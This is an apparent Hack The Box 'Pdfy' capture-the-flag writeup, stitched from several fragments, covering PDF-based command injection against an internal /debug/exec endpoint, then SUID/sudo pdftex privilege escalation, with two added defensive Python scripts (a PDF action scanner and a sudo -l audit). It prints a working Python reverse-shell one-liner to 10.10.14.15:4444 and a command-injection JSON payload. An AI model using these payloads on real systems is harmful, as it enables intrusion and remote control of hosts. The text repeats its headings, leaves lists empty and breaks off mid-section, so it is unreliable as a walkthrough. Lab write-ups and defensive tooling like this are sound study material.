
Pdfy HTB Writeup (Upd. May 2026)

The writeup follows a logical, phase-based approach:

Each section is broken into “Command → Explanation → Expected Output”, making it easy to follow without blindly copy-pasting. The author also adds “Why this works” callouts — for example, explaining how exiftool can embed malicious JavaScript into PDF metadata that gets executed by the server’s PDF parser.

Minor critique: The writeup could use more screenshots of the web interface, especially the PDF upload/generation page. A few diagrams of the privilege escalation flow would also help visual learners.


nmap -sC -sV -oA pdfy 10.10.11.xx

Ports open:

The internal API has a /debug/exec endpoint (found via fuzzing).

Command injection via PDF:

Create a PDF with an HTTP POST request to http://127.0.0.1:5000/debug/exec with JSON body:

{"cmd": "id"}

Embed this as a PDF form submission action.

Upload → server executes id and returns output embedded in PNG comment.

Get reverse shell:

{"cmd": "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.15\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"]);'"}

Listener catches shell as www-data.



Mitigation:
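The writeup leaves this section empty. As an added example (not from the writeup, and not Hack The Box's or any project's code), here is the kind of upload-side gate a defender would put in front of a PDF-to-PNG converter for the abuse described above: it rejects documents that carry active actions (the SubmitForm action the writeup uses, plus URI, Launch and JavaScript actions) and separately flags action URLs that point at loopback or private address space. The function names and both sample documents are constructed for this example.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# PDF action types that make a renderer do more than draw the page.
# /SubmitForm is the one the writeup abuses; the others are caught for the same reason.
ACTIVE_ACTIONS = (b"SubmitForm", b"URI", b"Launch", b"JavaScript", b"GoToR", b"ImportData")

_ACTION_RE = re.compile(rb"/S\s*/(" + b"|".join(ACTIVE_ACTIONS) + rb")\b")
# URL operands of actions: /F or /URI followed by a literal (...) or hex <...> string.
_URL_RE = re.compile(rb"/(?:F|URI)\s*(?:\((?P<lit>[^)]*)\)|<(?P<hex>[0-9A-Fa-f\s]*)>)")
_JS_RE = re.compile(rb"/JS\b")
_OBJSTM_RE = re.compile(rb"/Type\s*/ObjStm")


def _decode_pdf_string(m) -> str:
    """Decode a literal or hex PDF string (escape sequences are not handled; see note)."""
    if m.group("lit") is not None:
        return m.group("lit").decode("latin-1")
    return bytes.fromhex(re.sub(rb"\s", b"", m.group("hex")).decode()).decode("latin-1")


def is_internal_target(url: str) -> bool:
    """True if a URL points at loopback, link-local or private address space.

    Hostnames are not resolved here (offline check); DNS rebinding and name-based
    access to internal services must be handled by the renderer's egress policy.
    """
    parts = urlsplit(url)
    if not parts.scheme:
        return False  # not a network target
    host = parts.hostname
    if not host or host == "localhost":
        return True
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return False  # a hostname, left to the egress policy


def scan_pdf(data: bytes) -> dict:
    """Return {'accept': bool, 'findings': [...]} for an uploaded PDF's raw bytes."""
    findings = []
    for m in _ACTION_RE.finditer(data):
        findings.append(f"action /S /{m.group(1).decode()}")
    if _JS_RE.search(data):
        findings.append("embedded JavaScript (/JS)")
    for m in _URL_RE.finditer(data):
        url = _decode_pdf_string(m)
        if is_internal_target(url):
            findings.append(f"action targets an internal address: {url}")
    if _OBJSTM_RE.search(data):
        # Objects inside compressed object streams are invisible to this regex pass.
        findings.append("compressed object streams present: contents not inspected")
    return {"accept": not findings, "findings": findings}


# Constructed sample: a minimal document whose open action submits form data to a
# loopback URL, the shape of document the writeup describes. Not a real capture.
SAMPLE_MALICIOUS = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >> endobj
4 0 obj << /Type /Action /S /SubmitForm /F (http://127.0.0.1:5000/debug/exec) /Flags 0 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed sample: the same document with no actions at all.
SAMPLE_CLEAN = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for name, doc in (("malicious", SAMPLE_MALICIOUS), ("clean", SAMPLE_CLEAN)):
        print(name, scan_pdf(doc))
```

The gate rejects any document with active content rather than trying to judge individual URLs, which is the policy a converter that only needs to rasterise pages can afford. It is a byte-level check, so it should sit beside two stronger controls rather than replace them: a full PDF parser (it does not handle string escapes or decompress object streams, which is why it flags them) and a renderer that runs with no network egress at all, so that a surviving action cannot reach an internal endpoint like the one the writeup names.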


Pdfy HTB Writeup

Introduction

Pdfy is a medium-level difficulty box on Hack The Box (HTB), an online platform for cybersecurity enthusiasts to practice their skills in a legal and safe environment. The goal of this writeup is to provide a detailed walkthrough of how to exploit the Pdfy box and gain root access.

Initial Reconnaissance

The first step in exploiting any box on HTB is to perform initial reconnaissance. This involves gathering information about the target system, including its IP address, open ports, and services.

$ nmap -sV -p- 10.10.11.206
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-09 14:30 EDT
Nmap scan report for 10.10.11.206
Host is up (0.052s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.33 ((Ubuntu))
111/tcp  open  rpcbind 2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.6.25 (Ubuntu)
445/tcp  open  microsoft-ds Samba smbd 3.6.25 (Ubuntu)
5000/tcp open  upnp    MiniUPnPd 1.12
8080/tcp open  http    Apache httpd 2.4.33 ((Ubuntu))

The scan reveals that the target system has several open ports, including:

Enumeration

The next step is to enumerate the services running on these ports to gather more information about the system.

find / -perm -4000 2>/dev/null

Look for pdftex or tex. If pdftex is SUID root or you can run it as sudo, exploit it.

Check sudo rights:

sudo -l

You might see:

(ALL) NOPASSWD: /usr/bin/pdftex
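As an added example (not part of the writeup), a small audit that parses `sudo -l` output of the form shown above and reports the rules a hardening review would remove: rules with NOPASSWD, rules that run a shell-capable program as root, and rules with wildcard arguments. The sample output, the host name and the cleanup.sh rule are constructed; `SHELL_CAPABLE` is deliberately seeded only with the two programs the writeup names and is meant to be extended from your own baseline.

```python
import re

# Constructed `sudo -l` output in the shape the writeup shows. Only the pdftex
# rule comes from the writeup; the host name and the other rules are made up.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on pdfy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on pdfy:
    (ALL) NOPASSWD: /usr/bin/pdftex
    (root) /usr/bin/systemctl restart pdfy.service
    (root) NOPASSWD: /usr/local/bin/cleanup.sh *
"""

# Programs the writeup names. TeX engines can be configured to run external
# commands (shell escape), so a root rule for them is effectively a root rule.
# Assumption: extend this set from your own hardening baseline.
SHELL_CAPABLE = {"/usr/bin/pdftex", "/usr/bin/tex"}

# One command rule per line: "(runas[ : group]) [TAG: ...] command [args]".
_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")


def parse_sudo_l(text: str) -> list:
    """Return one dict per command rule; Defaults and header lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = _RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        runas = [r.strip() for r in m.group("runas").split(":")[0].split(",")]
        rules.append({"runas": runas, "tags": tags, "cmd": m.group("cmd")})
    return rules


def audit(rules: list) -> list:
    """Findings for rules that hand an unprivileged account a path to root."""
    findings = []
    for r in rules:
        cmd = r["cmd"]
        prog = cmd.split()[0]
        as_root = "ALL" in r["runas"] or "root" in r["runas"]
        if cmd == "ALL":
            findings.append(f"{cmd}: unrestricted sudo")
        if "NOPASSWD" in r["tags"]:
            findings.append(f"{cmd}: no password required, so any code running as this user can use it")
        if as_root and prog in SHELL_CAPABLE:
            findings.append(f"{cmd}: {prog} can run external commands via shell escape; a root rule for it is equivalent to root")
        if as_root and "*" in cmd:
            findings.append(f"{cmd}: wildcard arguments let the caller pass options the rule author did not intend")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print("-", finding)
```

Run it against real `sudo -l` output piped in from a host review. The fix for the rule the writeup shows is to remove it: if a service account genuinely needs to typeset documents, run the TeX engine as that account without sudo, and keep shell escape disabled in the TeX configuration so the engine cannot spawn other programs.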
Example LFI payloads:
